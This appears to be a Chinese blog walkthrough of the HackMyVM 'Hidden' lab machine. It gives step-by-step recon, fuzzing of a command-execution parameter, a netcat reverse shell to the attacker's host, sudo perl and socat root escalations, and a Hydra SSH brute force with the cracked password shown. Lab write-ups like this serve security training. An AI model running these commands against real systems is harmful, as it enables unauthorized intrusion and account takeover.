hmv[-_-]hidden

Hidden

image-20240706124847569

image-20240709101221009

信息搜集

端口扫描

┌──(kali💀kali)-[~/temp/hidden]
└─$ rustscan -a $IP -- -A
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
😵 https://admin.tryhackme.com

[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. 
Open 192.168.0.115:22
Open 192.168.0.115:80

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 b8:10:9f:60:e6:2b:62:cb:3a:8c:8c:60:4b:1d:99:b9 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3ylvuOcvHft6krWHeKWPUMaVDzsP3p1qgMQRAhN/Je6cYv6v31sopPMI/ZC2zVtSROx2gMs8bkuDRqv/CLy2Q/CpfDp/8c2dxAB80FfHgSB6SjjqmzxXVYYn5XD6j4wg3VaeSpJ+IXsjJM/aN1KOVLJvWaYgCRzFQfXleY5UG7fgs4ypB1v0PIhAEcCfdWwtz+tHxknWE+5tATVX1CWcNGPVOPS1DHjgV1kEFJXuewPh94KDPPvQ2syZ58aY2NwNcY1A+4sxVdNatS+n86HxXonnLUwHgYVVWKy4pBySuKO3xKHa/pBSeWKVl+sepntMG9xX/oslVaTGCPrsC7swL
|   256 64:b5:b8:e6:0f:79:23:4d:4a:c0:9b:0f:a7:75:67:c9 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAnWlNAqHASzmQdf1F+p1ckmLFkKITXoKyLOH8WBdgC1S9AGONNlgX/S/PghOt8pS7HSVX8M3mDUWihTLAKL+ig=
|   256 d1:11:e4:07:8a:fe:06:72:64:62:28:ca:e3:29:7b:a0 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBUpJzTS8YEHg/tP6eXPznmApCmk68xcyQnM5JbciztL
80/tcp open  http    syn-ack Apache httpd 2.4.38 ((Debian))
|_http-title: Level 1
|_http-server-header: Apache/2.4.38 (Debian)
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

乍一看,openssh版本好像有点问题,可能存在漏洞,也有可能是靶机比较老了,先不考虑这个:

目录扫描

┌──(kali💀kali)-[~/temp/hidden]
└─$ gobuster dir -u http://$IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,bak,txt,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.115/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,zip,bak,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 392]
/.php                 (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/.html                (Status: 403) [Size: 278]
/server-status        (Status: 403) [Size: 278]
Progress: 1323360 / 1323366 (100.00%)
===============================================================
Finished
===============================================================

漏洞发现

踩点

image-20240709101837589

看上去像是某种加密,查看一下源代码,发现:

  <!-- format xxx.xxxxxx.xxx -->

解码

https://www.dcode.fr/chiffres-symboles 查找到了这一编码:

image-20240709102642753

尝试进行解码:

image-20240709102846651

SYSHIDDENHMV

fuzz

看上去像是域名解析,尝试修改一下/etc/hosts

192.168.0.115   SYS.HIDDEN.HMV   

再次访问:

image-20240709103420118

检测源代码,毛都没发现,尝试目录爆破一下:

┌──(kali💀kali)-[~/temp/hidden]
└─$ feroxbuster -u http://sys.hidden.hmv/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -d 3 -s 200 301 302 

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.2
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://sys.hidden.hmv/
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 👌  Status Codes          │ [200, 301, 302]
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.2
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 3
 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
301      GET        9l       28w      316c http://sys.hidden.hmv/users => http://sys.hidden.hmv/users/
301      GET        9l       28w      318c http://sys.hidden.hmv/members => http://sys.hidden.hmv/members/
200      GET        5l        8w      110c http://sys.hidden.hmv/users/secret.txt
200      GET       55l      308w    19271c http://sys.hidden.hmv/members/7573185_0.webp
200      GET     2672l     8889w   650515c http://sys.hidden.hmv/mapascii.jpg
200      GET       17l       24w      282c http://sys.hidden.hmv/
301      GET        9l       28w      317c http://sys.hidden.hmv/weapon => http://sys.hidden.hmv/weapon/
[####################] - 5m    441099/441099  0s      found:7       errors:0      
[####################] - 4m    220546/220546  855/s   http://sys.hidden.hmv/ 
[####################] - 0s    220546/220546  5655026/s http://sys.hidden.hmv/users/ => Directory listing
[####################] - 0s    220546/220546  4410920/s http://sys.hidden.hmv/members/ => Directory listing
[####################] - 4m    220546/220546  848/s   http://sys.hidden.hmv/weapon/ 

尝试看一下敏感目录:

┌──(kali💀kali)-[~/temp/hidden]
└─$ curl -s http://sys.hidden.hmv/users/secret.txt | grep -v '^$'
-----------------------------------
$ sudo apt-get install windows10 -y
-----------------------------------

啊。。。。。

image-20240709110146537

嘶。。。。。继续进一步目录扫描吧:

┌──(kali💀kali)-[~/temp/hidden]
└─$ gobuster dir -u http://sys.hidden.hmv/weapon/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,zip,bak,txt,html
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://sys.hidden.hmv/weapon/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,php,zip,bak,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 279]
/.html                (Status: 403) [Size: 279]
/index.html           (Status: 200) [Size: 0]
/loot.php             (Status: 200) [Size: 0]
/.html                (Status: 403) [Size: 279]
/.php                 (Status: 403) [Size: 279]
Progress: 1323360 / 1323366 (100.00%)
===============================================================
Finished
===============================================================

尝试进行访问:

┌──(kali💀kali)-[~/temp/hidden]
└─$ curl http://sys.hidden.hmv/weapon/

┌──(kali💀kali)-[~/temp/hidden]
└─$ curl http://sys.hidden.hmv/weapon/loot.php 

┌──(kali💀kali)-[~/temp/hidden]
└─$ curl -is http://sys.hidden.hmv/weapon/loot.php
HTTP/1.1 200 OK
Date: Tue, 09 Jul 2024 03:22:43 GMT
Server: Apache/2.4.38 (Debian)
Content-Length: 0
Content-Type: text/html; charset=UTF-8

只剩这一个php了,尝试 fuzz 一下是否可以执行函数:

┌──(kali💀kali)-[~/temp/hidden]
└─$ wfuzz -u http://sys.hidden.hmv/weapon/loot.php?FUZZ=whoami -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0 2>/dev/null
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://sys.hidden.hmv/weapon/loot.php?FUZZ=whoami
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                           
=====================================================================

000001799:   200        1 L      1 W        9 Ch        "hack"                                                                            

Total time: 0
Processed Requests: 220560
Filtered Requests: 220559
Requests/sec.: 0

ffuf也可以做到这件事:

┌──(kali💀kali)-[~/temp/hidden]
└─$ ffuf -u http://sys.hidden.hmv/weapon/loot.php?FUZZ=whoami -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -c --fs 0

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://sys.hidden.hmv/weapon/loot.php?FUZZ=whoami
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response size: 0
________________________________________________

hack                    [Status: 200, Size: 9, Words: 1, Lines: 2, Duration: 54ms]
:: Progress: [220560/220560] :: Job [1/1] :: 3389 req/sec :: Duration: [0:01:00] :: Errors: 0 ::

尝试执行系统命令,反弹shell:

┌──(kali💀kali)-[~/temp/hidden]
└─$ curl -is http://sys.hidden.hmv/weapon/loot.php?hack=nc+-e+/bin/bash+192.168.0.143+1234

image-20240709121740713

提权

perl提权用户

(remote) www-data@hidden:/var/www/hidden/weapon$ ls -la
total 12
drwxr-xr-x 2 root root 4096 May 22  2021 .
drwxr-xr-x 5 root root 4096 May 23  2021 ..
-rw-r--r-- 1 root root    0 May 22  2021 index.html
-rw-r--r-- 1 root root   46 May 22  2021 loot.php
(remote) www-data@hidden:/var/www/hidden/weapon$ cd ~
(remote) www-data@hidden:/var/www$ sudo -l
Matching Defaults entries for www-data on hidden:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on hidden:
    (toreto) NOPASSWD: /usr/bin/perl

参考:https://gtfobins.github.io/gtfobins/perl/#sudo

进行提权:

sudo -u toreto /usr/bin/perl -e 'exec "/bin/bash";'

image-20240709121934410

爆破提权用户

toreto@hidden:~$ whoami;id
toreto
uid=1001(toreto) gid=1000(toreto) groups=1000(toreto)
toreto@hidden:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for toreto: 
toreto@hidden:~$ cat /etc/passwd | grep '/bin/bash'
root:x:0:0:root:/root:/bin/bash
atenea:x:1000:1001:,,,:/home/atenea:/bin/bash
toreto:x:1001:1000:,,,:/home/toreto:/bin/bash
toreto@hidden:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/gpasswd
/usr/bin/su
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/mount
toreto@hidden:~$ ls -la
total 24
drwxr-xr-x 2 toreto toreto 4096 May 24  2021 .
drwxr-xr-x 4 root   root   4096 May 24  2021 ..
-rw------- 1 toreto toreto    1 May 25  2021 .bash_history
-rw-r--r-- 1 toreto toreto  220 May 24  2021 .bash_logout
-rw-r--r-- 1 toreto toreto 3526 May 24  2021 .bashrc
-rw-r--r-- 1 toreto toreto  807 May 24  2021 .profile
toreto@hidden:~$ cd ../atenea/
toreto@hidden:/home/atenea$ ls -la
total 36
drwxr-xr-x 4 atenea atenea 4096 May 23  2021 .
drwxr-xr-x 4 root   root   4096 May 24  2021 ..
-rw------- 1 atenea atenea    1 May 25  2021 .bash_history
-rw-r--r-- 1 atenea atenea  220 May 22  2021 .bash_logout
-rw-r--r-- 1 atenea atenea 3526 May 22  2021 .bashrc
drwxr-xr-x 2 atenea atenea 4096 May 22  2021 .hidden
drwxr-xr-x 3 atenea atenea 4096 May 23  2021 .local
-rw-r--r-- 1 atenea atenea  807 May 22  2021 .profile
-rw------- 1 atenea atenea   63 May 23  2021 user.txt
toreto@hidden:/home/atenea$ cd .hidden/
toreto@hidden:/home/atenea/.hidden$ ls -la
total 16
drwxr-xr-x 2 atenea atenea 4096 May 22  2021 .
drwxr-xr-x 4 atenea atenea 4096 May 23  2021 ..
-rw------- 1 toreto toreto 6170 May 22  2021 atenea.txt
toreto@hidden:/home/atenea/.hidden$ cat atenea.txt

尝试写一个脚本爆破一下,额太慢了,还是hydra吧:

┌──(kali💀kali)-[~/temp/hidden]
└─$ hydra -l atenea -P atenea.txt ssh://192.168.0.115 2>/dev/null
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-09 00:36:17
[DATA] max 16 tasks per 1 server, overall 16 tasks, 561 login tries (l:1/p:561), ~36 tries per task
[DATA] attacking ssh://192.168.0.115:22/
[STATUS] 133.00 tries/min, 133 tries in 00:01h, 431 to do in 00:04h, 13 active
[STATUS] 92.00 tries/min, 276 tries in 00:03h, 288 to do in 00:04h, 13 active
[22][ssh] host: 192.168.0.115   login: atenea   password: sys8423hmv
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-07-09 00:41:40

image-20240709124306531

提权root

https://gtfobins.github.io/gtfobins/socat/#sudo

atenea@hidden:~$ sudo -l
Matching Defaults entries for atenea on hidden:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User atenea may run the following commands on hidden:
    (root) NOPASSWD: /usr/bin/socat
atenea@hidden:~$ sudo socat stdin exec:/bin/bash
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)

参考

https://conper.gitbook.io/hacking/practice/writeups/hackmyvm/easy/hidden

https://www.freebuf.com/articles/web/327934.html

https://grumpygeekwrites.wordpress.com/2021/05/31/hackmyvm-hidden-walk-through-tutorial-writeup/

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇